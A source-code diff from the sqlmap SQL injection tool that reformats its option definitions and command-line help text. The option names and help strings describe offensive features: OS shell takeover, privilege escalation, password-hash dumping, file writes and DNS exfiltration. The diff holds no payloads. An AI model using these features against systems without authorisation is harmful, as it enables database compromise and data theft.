"ignoreProxy": "boolean", - "ignoreRedirects": "boolean", - "ignoreTimeouts": "boolean", - "proxy": "string", - "proxyCred": "string", - "proxyFile": "string", - "tor": "boolean", - "torPort": "integer", - "torType": "string", - "checkTor": "boolean", - "delay": "float", - "timeout": "float", - "retries": "integer", - "rParam": "string", - "safeUrl": "string", - "safePost": "string", - "safeReqFile": "string", - "safeFreq": "integer", - "skipUrlEncode": "boolean", - "csrfToken": "string", - "csrfUrl": "string", - "forceSSL": "boolean", - "hpp": "boolean", - "evalCode": "string", - }, - - "Optimization": { - "optimize": "boolean", - "predictOutput": "boolean", - "keepAlive": "boolean", - "nullConnection": "boolean", - "threads": "integer", - }, - - "Injection": { - "testParameter": "string", - "skip": "string", - "skipStatic": "boolean", - "paramExclude": "string", - "dbms": "string", - "dbmsCred": "string", - "os": "string", - "invalidBignum": "boolean", - "invalidLogical": "boolean", - "invalidString": "boolean", - "noCast": "boolean", - "noEscape": "boolean", - "prefix": "string", - "suffix": "string", - "tamper": "string", - }, - - "Detection": { - "level": "integer", - "risk": "integer", - "string": "string", - "notString": "string", - "regexp": "string", - "code": "integer", - "textOnly": "boolean", - "titles": "boolean", - }, - - "Techniques": { - "tech": "string", - "timeSec": "integer", - "uCols": "string", - "uChar": "string", - "uFrom": "string", - "dnsDomain": "string", - "secondOrder": "string", - }, - - "Fingerprint": { - "extensiveFp": "boolean", - }, - - "Enumeration": { - "getAll": "boolean", - "getBanner": ("boolean", "Banners"), - "getCurrentUser": ("boolean", "Users"), - "getCurrentDb": ("boolean", "Databases"), - "getHostname": "boolean", - "isDba": "boolean", - "getUsers": ("boolean", "Users"), - "getPasswordHashes": ("boolean", "Passwords"), - "getPrivileges": ("boolean", "Privileges"), - "getRoles": ("boolean", "Roles"), - "getDbs": ("boolean", "Databases"), - "getTables": ("boolean", "Tables"), - "getColumns": ("boolean", "Columns"), - "getSchema": "boolean", - "getCount": "boolean", - "dumpTable": "boolean", - "dumpAll": "boolean", - "search": "boolean", - "getComments": "boolean", - "db": "string", - "tbl": "string", - "col": "string", - "exclude": "string", - "pivotColumn": "string", - "dumpWhere": "string", - "user": "string", - "excludeSysDbs": "boolean", - "limitStart": "integer", - "limitStop": "integer", - "firstChar": "integer", - "lastChar": "integer", - "query": "string", - "sqlShell": "boolean", - "sqlFile": "string", - }, - - "Brute": { - "commonTables": "boolean", - "commonColumns": "boolean", - }, - - "User-defined function": { - "udfInject": "boolean", - "shLib": "string", - }, - - "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", - }, - - "Takeover": { - "osCmd": "string", - "osShell": "boolean", - "osPwn": "boolean", - "osSmb": "boolean", - "osBof": "boolean", - "privEsc": "boolean", - "msfPath": "string", - "tmpPath": "string", - }, - - "Windows": { - "regRead": "boolean", - "regAdd": "boolean", - "regDel": "boolean", - "regKey": "string", - "regVal": "string", - "regData": "string", - "regType": "string", - }, - - "General": { - #"xmlFile": "string", - "trafficFile": "string", - "batch": "boolean", - "binaryFields": "string", - "charset": "string", - "checkInternet": "boolean", - "crawlDepth": "integer", - "crawlExclude": "string", - "csvDel": "string", - "dumpFormat": "string", - "encoding": "string", - "eta": "boolean", - "flushSession": "boolean", - "forms": "boolean", - "freshQueries": "boolean", - "harFile": "string", - "hexConvert": "boolean", - "outputDir": "string", - "parseErrors": "boolean", - "saveConfig": "string", - "scope": "string", - "testFilter": "string", - "testSkip": "string", - "updateAll": "boolean", - }, - - "Miscellaneous": { - "alert": "string", - "answers": "string", - "beep": "boolean", - "cleanup": "boolean", - "dependencies": "boolean", - "disableColoring": "boolean", - "googlePage": "integer", - "identifyWaf": "boolean", - "mobile": "boolean", - "offline": "boolean", - "purgeOutput": "boolean", - "skipWaf": "boolean", - "smart": "boolean", - "tmpDir": "string", - "webRoot": "string", - "wizard": "boolean", - "verbose": "integer", - }, - "Hidden": { - "dummy": "boolean", - "disablePrecon": "boolean", - "profile": "boolean", - "forceDns": "boolean", - "murphyRate": "integer", - "smokeTest": "boolean", - "liveTest": "boolean", - "stopFail": "boolean", - "runCase": "string", - }, - "API": { - "api": "boolean", - "taskid": "string", - "database": "string", - } - } + # Family: {"parameter name": "parameter datatype"}, + # --OR-- + # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")}, + + "Target": { + "direct": "string", + "url": "string", + "logFile": "string", + "bulkFile": "string", + "requestFile": "string", + "sessionFile": "string", + "googleDork": "string", + "configFile": "string", + "sitemapUrl": "string", + }, + + "Request": { + "method": "string", + "data": "string", + "paramDel": "string", + "cookie": "string", + "cookieDel": "string", + "loadCookies": "string", + "dropSetCookie": "boolean", + "agent": "string", + "randomAgent": "boolean", + "host": "string", + "referer": "string", + "headers": "string", + "authType": "string", + "authCred": "string", + "authFile": "string", + "ignoreCode": "integer", + "ignoreProxy": "boolean", + "ignoreRedirects": "boolean", + "ignoreTimeouts": "boolean", + "proxy": "string", + "proxyCred": "string", + "proxyFile": "string", + "tor": "boolean", + "torPort": "integer", + "torType": "string", + "checkTor": "boolean", + "delay": "float", + "timeout": "float", + "retries": "integer", + "rParam": "string", + "safeUrl": "string", + "safePost": "string", + "safeReqFile": "string", + "safeFreq": "integer", + "skipUrlEncode": "boolean", + "csrfToken": "string", + "csrfUrl": "string", + "forceSSL": "boolean", + "hpp": "boolean", + "evalCode": "string", + }, + + "Optimization": { + "optimize": "boolean", + "predictOutput": "boolean", + "keepAlive": "boolean", + "nullConnection": "boolean", + "threads": "integer", + }, + + "Injection": { + "testParameter": "string", + "skip": "string", + "skipStatic": "boolean", + "paramExclude": "string", + "dbms": "string", + "dbmsCred": "string", + "os": "string", + "invalidBignum": "boolean", + "invalidLogical": "boolean", + "invalidString": "boolean", + "noCast": "boolean", + "noEscape": "boolean", + "prefix": "string", + "suffix": "string", + "tamper": "string", + }, + + "Detection": { + "level": "integer", + "risk": "integer", + "string": "string", + "notString": "string", + "regexp": "string", + "code": "integer", + "textOnly": "boolean", + "titles": "boolean", + }, + + "Techniques": { + "tech": "string", + "timeSec": "integer", + "uCols": "string", + "uChar": "string", + "uFrom": "string", + "dnsDomain": "string", + "secondOrder": "string", + }, + + "Fingerprint": { + "extensiveFp": "boolean", + }, + + "Enumeration": { + "getAll": "boolean", + "getBanner": ("boolean", "Banners"), + "getCurrentUser": ("boolean", "Users"), + "getCurrentDb": ("boolean", "Databases"), + "getHostname": "boolean", + "isDba": "boolean", + "getUsers": ("boolean", "Users"), + "getPasswordHashes": ("boolean", "Passwords"), + "getPrivileges": ("boolean", "Privileges"), + "getRoles": ("boolean", "Roles"), + "getDbs": ("boolean", "Databases"), + "getTables": ("boolean", "Tables"), + "getColumns": ("boolean", "Columns"), + "getSchema": "boolean", + "getCount": "boolean", + "dumpTable": "boolean", + "dumpAll": "boolean", + "search": "boolean", + "getComments": "boolean", + "db": "string", + "tbl": "string", + "col": "string", + "exclude": "string", + "pivotColumn": "string", + "dumpWhere": "string", + "user": "string", + "excludeSysDbs": "boolean", + "limitStart": "integer", + "limitStop": "integer", + "firstChar": "integer", + "lastChar": "integer", + "query": "string", + "sqlShell": "boolean", + "sqlFile": "string", + }, + + "Brute": { + "commonTables": "boolean", + "commonColumns": "boolean", + }, + + "User-defined function": { + "udfInject": "boolean", + "shLib": "string", + }, + + "File system": { + "rFile": "string", + "wFile": "string", + "dFile": "string", + }, + + "Takeover": { + "osCmd": "string", + "osShell": "boolean", + "osPwn": "boolean", + "osSmb": "boolean", + "osBof": "boolean", + "privEsc": "boolean", + "msfPath": "string", + "tmpPath": "string", + }, + + "Windows": { + "regRead": "boolean", + "regAdd": "boolean", + "regDel": "boolean", + "regKey": "string", + "regVal": "string", + "regData": "string", + "regType": "string", + }, + + "General": { + # "xmlFile": "string", + "trafficFile": "string", + "batch": "boolean", + "binaryFields": "string", + "charset": "string", + "checkInternet": "boolean", + "crawlDepth": "integer", + "crawlExclude": "string", + "csvDel": "string", + "dumpFormat": "string", + "encoding": "string", + "eta": "boolean", + "flushSession": "boolean", + "forms": "boolean", + "freshQueries": "boolean", + "harFile": "string", + "hexConvert": "boolean", + "outputDir": "string", + "parseErrors": "boolean", + "saveConfig": "string", + "scope": "string", + "testFilter": "string", + "testSkip": "string", + "updateAll": "boolean", + }, + + "Miscellaneous": { + "alert": "string", + "answers": "string", + "beep": "boolean", + "cleanup": "boolean", + "dependencies": "boolean", + "disableColoring": "boolean", + "googlePage": "integer", + "identifyWaf": "boolean", + "mobile": "boolean", + "offline": "boolean", + "purgeOutput": "boolean", + "skipWaf": "boolean", + "smart": "boolean", + "tmpDir": "string", + "webRoot": "string", + "wizard": "boolean", + "verbose": "integer", + }, + + "Hidden": { + "dummy": "boolean", + "disablePrecon": "boolean", + "profile": "boolean", + "forceDns": "boolean", + "murphyRate": "integer", + "smokeTest": "boolean", + "liveTest": "boolean", + "stopFail": "boolean", + "runCase": "string", + }, + + "API": { + "api": "boolean", + "taskid": "string", + "database": "string", + } +} diff --git a/lib/core/profiling.py b/lib/core/profiling.py index c8ede5a2d3d..c1bd8acd57b 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -20,9 +20,9 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): """ try: + __import__("gobject") from thirdparty.gprof2dot import gprof2dot from thirdparty.xdot import xdot - import gobject import gtk import pydot except ImportError, e: diff --git a/lib/core/settings.py b/lib/core/settings.py index 93439d4abef..b72893f7004 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.22" +VERSION = "1.2.3.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -224,7 +224,7 @@ MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") -ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ +ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") diff --git a/lib/core/shell.py b/lib/core/shell.py index b6c200755a4..3920d68f99e 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -104,20 +104,20 @@ def autoCompletion(completion=None, os=None, commands=None): if os == OS.WINDOWS: # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands completer = CompleterNG({ - "copy": None, "del": None, "dir": None, - "echo": None, "md": None, "mem": None, - "move": None, "net": None, "netstat -na": None, - "ver": None, "xcopy": None, "whoami": None, - }) + "copy": None, "del": None, "dir": None, + "echo": None, "md": None, "mem": None, + "move": None, "net": None, "netstat -na": None, + "ver": None, "xcopy": None, "whoami": None, + }) else: # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands completer = CompleterNG({ - "cp": None, "rm": None, "ls": None, - "echo": None, "mkdir": None, "free": None, - "mv": None, "ifconfig": None, "netstat -natu": None, - "pwd": None, "uname": None, "id": None, - }) + "cp": None, "rm": None, "ls": None, + "echo": None, "mkdir": None, "free": None, + "mv": None, "ifconfig": None, "netstat -natu": None, + "pwd": None, "uname": None, "id": None, + }) readline.set_completer(completer.complete) readline.parse_and_bind("tab: complete") diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index e82f172cd17..b51a64bba2f 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -8,7 +8,6 @@ import errno import os import subprocess -import sys import time from lib.core.settings import IS_WIN @@ -24,11 +23,6 @@ import select import fcntl - if (sys.hexversion >> 16) >= 0x202: - FCNTL = fcntl - else: - import FCNTL - def blockingReadFromFD(fd): # Quick twist around original Twisted function # Blocking read from a non-blocking file descriptor diff --git a/lib/core/target.py b/lib/core/target.py index d5ec2ccf92c..ab1aa2f6b9c 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -232,7 +232,7 @@ def process(match, repl): kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks - if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"): + if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"): warnMsg = "you've provided target URL without any GET " warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "and without providing any POST parameters " @@ -377,7 +377,7 @@ def process(match, repl): if condition: conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)} - conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders] + conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders] testableParameters = True if not conf.parameters: @@ -391,7 +391,7 @@ def process(match, repl): raise SqlmapGenericException(errMsg) if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): + if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}): errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken errMsg += "found in provided GET, POST, Cookie or header values" raise SqlmapGenericException(errMsg) @@ -449,13 +449,10 @@ def _resumeHashDBValues(): conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: - if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \ - injection.parameter in conf.paramDict[injection.place]: - + if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]: if not conf.tech or intersect(conf.tech, injection.data.keys()): if intersect(conf.tech, injection.data.keys()): injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech) - if injection not in kb.injections: kb.injections.append(injection) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 832884f31d8..3794d3ac231 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -50,9 +50,7 @@ def cmdLineParser(argv=None): # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) - usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ - "\"%s\"" % _ if " " in _ else _) - + usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _) parser = OptionParser(usage=usage) try: @@ -115,15 +113,13 @@ def cmdLineParser(argv=None): request.add_option("--load-cookies", dest="loadCookies", help="File containing cookies in Netscape/wget format") - request.add_option("--drop-set-cookie", dest="dropSetCookie", - action="store_true", + request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true", help="Ignore Set-Cookie header from response") request.add_option("--user-agent", dest="agent", help="HTTP User-Agent header value") - request.add_option("--random-agent", dest="randomAgent", - action="store_true", + request.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value") request.add_option("--host", dest="host", @@ -139,62 +135,55 @@ def cmdLineParser(argv=None): help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") request.add_option("--auth-type", dest="authType", - help="HTTP authentication type " - "(Basic, Digest, NTLM or PKI)") + help="HTTP authentication type (Basic, Digest, NTLM or PKI)") request.add_option("--auth-cred", dest="authCred", - help="HTTP authentication credentials " - "(name:password)") + help="HTTP authentication credentials (name:password)") request.add_option("--auth-file", dest="authFile", help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-code", dest="ignoreCode", type="int", - help="Ignore HTTP error code (e.g. 401)") + help="Ignore HTTP error code (e.g. 401)") request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", help="Ignore system default proxy settings") request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true", - help="Ignore redirection attempts") + help="Ignore redirection attempts") request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", - help="Ignore connection timeouts") + help="Ignore connection timeouts") request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL") request.add_option("--proxy-cred", dest="proxyCred", - help="Proxy authentication credentials " - "(name:password)") + help="Proxy authentication credentials (name:password)") request.add_option("--proxy-file", dest="proxyFile", help="Load proxy list from a file") - request.add_option("--tor", dest="tor", - action="store_true", - help="Use Tor anonymity network") + request.add_option("--tor", dest="tor", action="store_true", + help="Use Tor anonymity network") request.add_option("--tor-port", dest="torPort", - help="Set Tor proxy port other than default") + help="Set Tor proxy port other than default") request.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") + help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") - request.add_option("--check-tor", dest="checkTor", - action="store_true", - help="Check to see if Tor is used properly") + request.add_option("--check-tor", dest="checkTor", action="store_true", + help="Check to see if Tor is used properly") request.add_option("--delay", dest="delay", type="float", help="Delay in seconds between each HTTP request") request.add_option("--timeout", dest="timeout", type="float", - help="Seconds to wait before timeout connection " - "(default %d)" % defaults.timeout) + help="Seconds to wait before timeout connection (default %d)" % defaults.timeout) request.add_option("--retries", dest="retries", type="int", - help="Retries when the connection timeouts " - "(default %d)" % defaults.retries) + help="Retries when the connection timeouts (default %d)" % defaults.retries) request.add_option("--randomize", dest="rParam", help="Randomly change value for given parameter(s)") @@ -211,8 +200,7 @@ def cmdLineParser(argv=None): request.add_option("--safe-freq", dest="safeFreq", type="int", help="Test requests between two visits to a given safe URL") - request.add_option("--skip-urlencode", dest="skipUrlEncode", - action="store_true", + request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true", help="Skip URL encoding of payload data") request.add_option("--csrf-token", dest="csrfToken", @@ -221,44 +209,36 @@ def cmdLineParser(argv=None): request.add_option("--csrf-url", dest="csrfUrl", help="URL address to visit to extract anti-CSRF token") - request.add_option("--force-ssl", dest="forceSSL", - action="store_true", + request.add_option("--force-ssl", dest="forceSSL", action="store_true", help="Force usage of SSL/HTTPS") - request.add_option("--hpp", dest="hpp", - action="store_true", - help="Use HTTP parameter pollution method") + request.add_option("--hpp", dest="hpp", action="store_true", + help="Use HTTP parameter pollution method") request.add_option("--eval", dest="evalCode", help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") # Optimization options - optimization = OptionGroup(parser, "Optimization", "These " - "options can be used to optimize the " - "performance of sqlmap") + optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap") - optimization.add_option("-o", dest="optimize", - action="store_true", - help="Turn on all optimization switches") + optimization.add_option("-o", dest="optimize", action="store_true", + help="Turn on all optimization switches") optimization.add_option("--predict-output", dest="predictOutput", action="store_true", - help="Predict common queries output") + help="Predict common queries output") optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", - help="Use persistent HTTP(s) connections") + help="Use persistent HTTP(s) connections") optimization.add_option("--null-connection", dest="nullConnection", action="store_true", - help="Retrieve page length without actual HTTP response body") + help="Retrieve page length without actual HTTP response body") optimization.add_option("--threads", dest="threads", type="int", - help="Max number of concurrent HTTP(s) " + help="Max number of concurrent HTTP(s) " "requests (default %d)" % defaults.threads) # Injection options - injection = OptionGroup(parser, "Injection", "These options can be " - "used to specify which parameters to test " - "for, provide custom injection payloads and " - "optional tampering scripts") + injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts") injection.add_option("-p", dest="testParameter", help="Testable parameter(s)") @@ -270,36 +250,30 @@ def cmdLineParser(argv=None): help="Skip testing parameters that not appear to be dynamic") injection.add_option("--param-exclude", dest="paramExclude", - help="Regexp to exclude parameters from testing (e.g. \"ses\")") + help="Regexp to exclude parameters from testing (e.g. \"ses\")") injection.add_option("--dbms", dest="dbms", help="Force back-end DBMS to this value") injection.add_option("--dbms-cred", dest="dbmsCred", - help="DBMS authentication credentials (user:password)") + help="DBMS authentication credentials (user:password)") injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system " - "to this value") + help="Force back-end DBMS operating system to this value") - injection.add_option("--invalid-bignum", dest="invalidBignum", - action="store_true", + injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true", help="Use big numbers for invalidating values") - injection.add_option("--invalid-logical", dest="invalidLogical", - action="store_true", + injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true", help="Use logical operations for invalidating values") - injection.add_option("--invalid-string", dest="invalidString", - action="store_true", + injection.add_option("--invalid-string", dest="invalidString", action="store_true", help="Use random strings for invalidating values") - injection.add_option("--no-cast", dest="noCast", - action="store_true", + injection.add_option("--no-cast", dest="noCast", action="store_true", help="Turn off payload casting mechanism") - injection.add_option("--no-escape", dest="noEscape", - action="store_true", + injection.add_option("--no-escape", dest="noEscape", action="store_true", help="Turn off string escaping mechanism") injection.add_option("--prefix", dest="prefix", @@ -312,54 +286,40 @@ def cmdLineParser(argv=None): help="Use given script(s) for tampering injection data") # Detection options - detection = OptionGroup(parser, "Detection", "These options can be " - "used to customize the detection phase") + detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase") detection.add_option("--level", dest="level", type="int", - help="Level of tests to perform (1-5, " - "default %d)" % defaults.level) + help="Level of tests to perform (1-5, default %d)" % defaults.level) detection.add_option("--risk", dest="risk", type="int", - help="Risk of tests to perform (1-3, " - "default %d)" % defaults.risk) + help="Risk of tests to perform (1-3, default %d)" % defaults.risk) detection.add_option("--string", dest="string", - help="String to match when " - "query is evaluated to True") + help="String to match when query is evaluated to True") detection.add_option("--not-string", dest="notString", - help="String to match when " - "query is evaluated to False") + help="String to match when query is evaluated to False") detection.add_option("--regexp", dest="regexp", - help="Regexp to match when " - "query is evaluated to True") + help="Regexp to match when query is evaluated to True") detection.add_option("--code", dest="code", type="int", - help="HTTP code to match when " - "query is evaluated to True") + help="HTTP code to match when query is evaluated to True") - detection.add_option("--text-only", dest="textOnly", - action="store_true", + detection.add_option("--text-only", dest="textOnly", action="store_true", help="Compare pages based only on the textual content") - detection.add_option("--titles", dest="titles", - action="store_true", + detection.add_option("--titles", dest="titles", action="store_true", help="Compare pages based only on their titles") # Techniques options - techniques = OptionGroup(parser, "Techniques", "These options can be " - "used to tweak testing of specific SQL " - "injection techniques") + techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques") techniques.add_option("--technique", dest="tech", - help="SQL injection techniques to use " - "(default \"%s\")" % defaults.tech) + help="SQL injection techniques to use (default \"%s\")" % defaults.tech) - techniques.add_option("--time-sec", dest="timeSec", - type="int", - help="Seconds to delay the DBMS response " - "(default %d)" % defaults.timeSec) + techniques.add_option("--time-sec", dest="timeSec", type="int", + help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) techniques.add_option("--union-cols", dest="uCols", help="Range of columns to test for UNION query SQL injection") @@ -374,58 +334,45 @@ def cmdLineParser(argv=None): help="Domain name used for DNS exfiltration attack") techniques.add_option("--second-order", dest="secondOrder", - help="Resulting page URL searched for second-order " - "response") + help="Resulting page URL searched for second-order response") # Fingerprint options fingerprint = OptionGroup(parser, "Fingerprint") - fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", - action="store_true", + fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true", help="Perform an extensive DBMS version fingerprint") # Enumeration options - enumeration = OptionGroup(parser, "Enumeration", "These options can " - "be used to enumerate the back-end database " - "management system information, structure " - "and data contained in the tables. Moreover " - "you can run your own SQL statements") + enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements") - enumeration.add_option("-a", "--all", dest="getAll", - action="store_true", help="Retrieve everything") + enumeration.add_option("-a", "--all", dest="getAll", action="store_true", + help="Retrieve everything") - enumeration.add_option("-b", "--banner", dest="getBanner", - action="store_true", help="Retrieve DBMS banner") + enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true", + help="Retrieve DBMS banner") - enumeration.add_option("--current-user", dest="getCurrentUser", - action="store_true", + enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true", help="Retrieve DBMS current user") - enumeration.add_option("--current-db", dest="getCurrentDb", - action="store_true", + enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true", help="Retrieve DBMS current database") - enumeration.add_option("--hostname", dest="getHostname", - action="store_true", + enumeration.add_option("--hostname", dest="getHostname", action="store_true", help="Retrieve DBMS server hostname") - enumeration.add_option("--is-dba", dest="isDba", - action="store_true", + enumeration.add_option("--is-dba", dest="isDba", action="store_true", help="Detect if the DBMS current user is DBA") enumeration.add_option("--users", dest="getUsers", action="store_true", help="Enumerate DBMS users") - enumeration.add_option("--passwords", dest="getPasswordHashes", - action="store_true", + enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true", help="Enumerate DBMS users password hashes") - enumeration.add_option("--privileges", dest="getPrivileges", - action="store_true", + enumeration.add_option("--privileges", dest="getPrivileges", action="store_true", help="Enumerate DBMS users privileges") - enumeration.add_option("--roles", dest="getRoles", - action="store_true", + enumeration.add_option("--roles", dest="getRoles", action="store_true", help="Enumerate DBMS users roles") enumeration.add_option("--dbs", dest="getDbs", action="store_true", @@ -470,10 +417,8 @@ def cmdLineParser(argv=None): enumeration.add_option("-U", dest="user", help="DBMS user to enumerate") - enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", - action="store_true", - help="Exclude DBMS system databases when " - "enumerating tables") + enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true", + help="Exclude DBMS system databases when enumerating tables") enumeration.add_option("--pivot-column", dest="pivotColumn", help="Pivot column name") @@ -496,28 +441,23 @@ def cmdLineParser(argv=None): enumeration.add_option("--sql-query", dest="query", help="SQL statement to be executed") - enumeration.add_option("--sql-shell", dest="sqlShell", - action="store_true", + enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true", help="Prompt for an interactive SQL shell") enumeration.add_option("--sql-file", dest="sqlFile", help="Execute SQL statements from given file(s)") # Brute force options - brute = OptionGroup(parser, "Brute force", "These " - "options can be used to run brute force " - "checks") + brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks") brute.add_option("--common-tables", dest="commonTables", 